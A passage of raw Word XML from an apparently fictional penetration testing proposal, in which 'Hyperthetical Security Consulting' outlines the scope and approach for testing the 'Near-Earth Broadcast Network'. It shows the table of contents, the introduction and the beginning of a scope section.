            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370243" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>External Network Pentest</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_Toc129370243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4</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DB0D014" w14:textId="2236E5D8" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370244" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>External Web Application Pentest</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_Toc129370244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5</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="232B419F" w14:textId="6C353915" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370245" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Internal Network Pentest</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_Toc129370245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5</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D8126A2" w14:textId="195C1DB0" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370246" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Rules of Engagement</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_Toc129370246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5</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EB405B1" w14:textId="51F38AA7" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370247" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Methodology</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_Toc129370247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6</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B4B4646" w14:textId="3635991E" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370248" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Deliverables</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_Toc129370248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6</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61D39F5A" w14:textId="4C56BFEB" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370249" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Roles and Responsibilities</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_Toc129370249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7</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E953B2E" w14:textId="1AF9443D" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370250" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hyperthetical Consulting</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_Toc129370250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7</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E0C1461" w14:textId="239A9EDA" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370251" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Near-Earth Broadcast Network</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_Toc129370251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7</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0076775A" w14:textId="34D27E73" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370252" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix A: Glossary and Definitions</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_Toc129370252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8</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BCD6E51" w14:textId="4C30A874" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370253" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix B: Tools</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_Toc129370253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10</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="730E0339" w14:textId="079C0C53" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370254" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Reconnaissance</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_Toc129370254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10</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B9E994A" w14:textId="52EB145B" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370255" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerability Discovery</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_Toc129370255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10</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E6BA831" w14:textId="79EF5642" w:rsidR="00A44D04" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc129370256" w:history="1">
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation and Escalation</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_Toc129370256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10</w:t>
            </w:r>
            <w:r w:rsidR="00A44D04" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6978DAFB" w14:textId="53202077" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="084E113C" w14:textId="00130FE9" w:rsidR="00B00365" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="400069" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CE74A" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="005264D0" w:rsidRDefault="004F68CB" w:rsidP="00317DD7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc129370236"/>
      <w:bookmarkStart w:id="1" w:name="_Toc129370241"/>
      <w:r w:rsidRPr="005264D0">
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4BF1DF52" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="005264D0" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This Penetration Testing Proposal aims to provide a comprehensive approach to performing a penetration test against the Near-Earth Broadcast Network (“NBN”) IT infrastructure. This proposal outlines the scope, methodology, and deliverables for the proposed penetration test (“pentest”). Using our methods, the pentest team will identify vulnerabilities and potential security risks, provide recommended remediation, and suggest best practices for software solutions. The Hyperthetical Security Consulting (“Hyperthetical”) team has the necessary experience and expertise to perform a comprehensive and detailed pen test of NBN's IT infrastructure, identify vulnerabilities and recommend remediation measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19112AAD" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="005264D0" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>To test NBN's ability to defend against direct and indirect attacks, the Hyperthetical team will perform a comprehensive penetration test of NBN's external facing hosts and services, external web apps, and internal network. The team will begin the assessment from outside of the network and perform discovery and enumeration of the NBN external network. After verifying the discovered scope with the NBN security team, they will move on to vulnerability discovery and exploitation against the NBN external network and web applications. If the assessment team gains access to the NBN internal network, they will continue the assessment to find more vulnerabilities in the internal network. The team will perform testing with a focus on identifying medium to critical severity security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0354E8A0" w14:textId="67CA1461" w:rsidR="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The Hyperthetical team will conduct the Penetration Test to avoid disrupting NBN's day-to-day operations. The assessment team will not perform Denial of Service (DoS) testing and will provide NBN with a schedule of events outlining the planned testing activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BEFA61" w14:textId="1411A0DD" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Methods and Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3B9D74F6" w14:textId="1888DC8C" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc129370242"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Detailed Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="47920FF1" w14:textId="7B3BAE5F" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>All testing will be conducted within a stringently adhered-to scope. All findings and analyses are limited to this scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A03EA83" w14:textId="525FBBF1" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc129370243"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>External Network Pentest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="3DB9E75D" w14:textId="15D51593" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>In Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA96A6A" w14:textId="726DDA97" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The assessment team will enumerate all external-facing hosts and services. After performing enumeration, the team will verify the discovered scope with the NBN security team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D25BC3F" w14:textId="53CF2477" w:rsidR="00FD4229" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Out of Scope</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1705"/>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="5665"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="60ED69DB" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EA37C5E" w14:textId="703CE70C" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="619EF8F4" w14:textId="523C4EAF" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP Address/URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC19E94" w14:textId="65265871" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005264D0" w:rsidRPr="005264D0" w14:paraId="2E4ACD7E" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CA23984" w14:textId="59FD30B5" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
